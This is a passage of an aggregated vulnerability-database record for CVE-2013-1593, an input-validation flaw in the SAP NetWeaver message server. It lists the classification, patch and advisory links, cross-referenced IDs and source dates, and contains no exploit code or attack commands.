sources: IVD: 29348194-1f62-11e6-abef-000c29c66e3d // IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d // ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // VULMON: CVE-2013-1593 // JVNDB: JVNDB-2013-007128 // NVD: CVE-2013-1593

PROBLEMTYPE DATA

problemtype:CWE-129

Trust: 1.0

problemtype:Improper validation of array index (CWE-129) [NVD Evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2013-007128 // NVD: CVE-2013-1593

THREAT TYPE

remote

Trust: 0.8

sources: PACKETSTORM: 120350 // PACKETSTORM: 114279 // CNNVD: CNNVD-201302-368

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201302-368

PATCH

title:SAP has issued an update to correct this vulnerability.url:https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840

Trust: 1.4

title:top pageurl:https://www.sap.com/japan/index.html

Trust: 0.8

title:SAP has issued an update to correct this vulnerability.url:https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838

Trust: 0.7

title:SAP Netweaver ABAP 'msg_server.exe' parameter name patch for remote code execution vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/18435

Trust: 0.6

title:SAP Netweaver ABAP 'msg_server.exe' patch for buffer overflow vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/18434

Trust: 0.6

title:SAP NetWeaver ‘msg_server.exe’ Remediation measures for remote denial of service vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108971

Trust: 0.6

title:martingalloarurl:https://github.com/martingalloar/martingalloar

Trust: 0.1

title:publicationsurl:https://github.com/martingalloar/publications

Trust: 0.1

sources: ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433 // VULMON: CVE-2013-1593 // JVNDB: JVNDB-2013-007128 // CNNVD: CNNVD-201302-368

EXTERNAL IDS

db:NVDid:CVE-2013-1593

Trust: 2.9

db:BIDid:57956

Trust: 2.0

db:SECTRACKid:1028148

Trust: 1.7

db:ZDIid:ZDI-12-104

Trust: 0.9

db:CNVDid:CNVD-2012-3434

Trust: 0.8

db:CNVDid:CNVD-2012-3433

Trust: 0.8

db:ZDIid:ZDI-12-112

Trust: 0.8

db:ZDIid:ZDI-12-111

Trust: 0.8

db:JVNDBid:JVNDB-2013-007128

Trust: 0.8

db:ZDI_CANid:ZDI-CAN-1396

Trust: 0.7

db:ZDI_CANid:ZDI-CAN-1394

Trust: 0.7

db:ZDI_CANid:ZDI-CAN-1395

Trust: 0.7

db:BIDid:54229

Trust: 0.6

db:BIDid:54231

Trust: 0.6

db:CNNVDid:CNNVD-201302-368

Trust: 0.6

db:IVDid:29348194-1F62-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:IVDid:29FDB3DE-1F62-11E6-ABEF-000C29C66E3D

Trust: 0.2

db:PACKETSTORMid:120350

Trust: 0.2

db:VULMONid:CVE-2013-1593

Trust: 0.1

db:PACKETSTORMid:114279

Trust: 0.1

sources: IVD: 29348194-1f62-11e6-abef-000c29c66e3d // IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d // ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433 // VULMON: CVE-2013-1593 // BID: 57956 // JVNDB: JVNDB-2013-007128 // PACKETSTORM: 120350 // PACKETSTORM: 114279 // CNNVD: CNNVD-201302-368 // NVD: CVE-2013-1593

REFERENCES

url:https://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities

Trust: 2.6

url:http://www.securityfocus.com/bid/57956

Trust: 1.7

url:https://packetstormsecurity.com/files/cve/cve-2013-1593

Trust: 1.7

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/82065

Trust: 1.7

url:http://www.securitytracker.com/id/1028148

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2013-1593

Trust: 1.5

url:https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840

Trust: 1.4

url:https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838

Trust: 0.7

url:http://seclists.org/bugtraq/2012/jun/186

Trust: 0.6

url:http://seclists.org/bugtraq/2012/jun/185

Trust: 0.6

url:http://www.sap.com/platform/netweaver/index.epx

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/129.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://packetstormsecurity.com/files/120350/sap-netweaver-message-server-buffer-overflow.html

Trust: 0.1

url:https://github.com/martingalloar/martingalloar

Trust: 0.1

url:http://corelabs.coresecurity.com.

Trust: 0.1

url:http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Trust: 0.1

url:https://service.sap.com/sap/support/notes/1800603.

Trust: 0.1

url:http://corelabs.coresecurity.com/

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-104/.

Trust: 0.1

url:http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.

Trust: 0.1

url:http://www.sap.com/platform/netweaver/index.epx.

Trust: 0.1

url:http://www.coresecurity.com.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-1592

Trust: 0.1

url:http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Trust: 0.1

url:http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-112/.

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-111/.

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/disclosure_policy/

Trust: 0.1

url:http://twitter.com/thezdi

Trust: 0.1

url:http://www.tippingpoint.com

Trust: 0.1

url:http://www.zerodayinitiative.com

Trust: 0.1

url:http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-104

Trust: 0.1

sources: ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433 // VULMON: CVE-2013-1593 // BID: 57956 // JVNDB: JVNDB-2013-007128 // PACKETSTORM: 120350 // PACKETSTORM: 114279 // CNNVD: CNNVD-201302-368 // NVD: CVE-2013-1593

CREDITS

e6af8de8b1d4b2b6d5ba2610cbf9cd38

Trust: 2.1

sources: ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104

SOURCES

db:IVDid:29348194-1f62-11e6-abef-000c29c66e3d
db:IVDid:29fdb3de-1f62-11e6-abef-000c29c66e3d
db:ZDIid:ZDI-12-112
db:ZDIid:ZDI-12-111
db:ZDIid:ZDI-12-104
db:CNVDid:CNVD-2012-3434
db:CNVDid:CNVD-2012-3433
db:VULMONid:CVE-2013-1593
db:BIDid:57956
db:JVNDBid:JVNDB-2013-007128
db:PACKETSTORMid:120350
db:PACKETSTORMid:114279
db:CNNVDid:CNNVD-201302-368
db:NVDid:CVE-2013-1593

LAST UPDATE DATE

2024-12-10T22:54:23.222000+00:00


SOURCES UPDATE DATE

db:ZDIid:ZDI-12-112date:2012-06-28T00:00:00
db:ZDIid:ZDI-12-111date:2012-06-28T00:00:00
db:ZDIid:ZDI-12-104date:2012-06-27T00:00:00
db:CNVDid:CNVD-2012-3434date:2012-07-02T00:00:00
db:CNVDid:CNVD-2012-3433date:2012-07-02T00:00:00
db:VULMONid:CVE-2013-1593date:2020-01-31T00:00:00
db:BIDid:57956date:2013-06-12T18:46:00
db:JVNDBid:JVNDB-2013-007128date:2020-02-14T00:00:00
db:CNNVDid:CNNVD-201302-368date:2020-05-26T00:00:00
db:NVDid:CVE-2013-1593date:2020-01-31T16:42:13.070

SOURCES RELEASE DATE

db:IVDid:29348194-1f62-11e6-abef-000c29c66e3ddate:2012-07-02T00:00:00
db:IVDid:29fdb3de-1f62-11e6-abef-000c29c66e3ddate:2012-07-02T00:00:00
db:ZDIid:ZDI-12-112date:2012-06-28T00:00:00
db:ZDIid:ZDI-12-111date:2012-06-28T00:00:00
db:ZDIid:ZDI-12-104date:2012-06-27T00:00:00
db:CNVDid:CNVD-2012-3434date:2012-07-02T00:00:00
db:CNVDid:CNVD-2012-3433date:2012-07-02T00:00:00
db:VULMONid:CVE-2013-1593date:2020-01-23T00:00:00
db:BIDid:57956date:2013-02-13T00:00:00
db:JVNDBid:JVNDB-2013-007128date:2020-02-14T00:00:00
db:PACKETSTORMid:120350date:2013-02-15T23:44:44
db:PACKETSTORMid:114279date:2012-06-28T03:51:55
db:CNNVDid:CNNVD-201302-368date:2013-02-22T00:00:00
db:NVDid:CVE-2013-1593date:2020-01-23T20:15:11.730